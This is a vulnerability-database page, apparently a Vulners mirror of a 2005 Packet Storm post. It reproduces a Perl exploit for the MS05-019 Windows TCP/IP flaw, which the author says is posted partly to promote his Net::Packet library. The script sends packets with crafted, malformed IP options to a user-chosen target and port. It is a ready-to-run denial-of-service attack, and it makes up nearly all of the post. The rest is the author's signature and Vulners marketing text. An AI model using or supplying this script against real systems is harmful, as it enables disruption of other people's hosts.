Lucene search
K

ms05-019.txt

🗓️ 01 Jun 2005 00:00:00Reported by GomoRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Exploit for MS05-019 vulnerability in Net::Packet

Code
`  
Here is another exploit for MS05-019 vulnerability.  
  
Well, it is just to promote Net::Packet ;)  
  
---  
#!/usr/bin/perl  
use strict;  
use warnings;  
  
my %opts;  
use Getopt::Std;  
getopts('t:p:', \%opts);  
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};  
  
use Net::Pkt;  
  
$Env->debug(3);  
  
my $frame = Net::Packet::Frame->new(  
l3 => Net::Packet::IPv4->new(  
dst => $opts{t},  
options => "\x03\x27". 'G'x38,  
),  
l4 => Net::Packet::TCP->new(  
dst => $opts{p},  
),  
);  
  
$frame->send for 1..5;  
---  
  
--   
^ ___ ___ FreeBSD Network - http://www.GomoR.org/ <-+  
| / __ |__/ Systems & Security Engineer |  
| \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- |  
+--> Net::Packet <=> http://search.cpan.org/~gomor/ <--+  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jun 2005 00:00Current
7.4High risk
Vulners AI Score7.4
17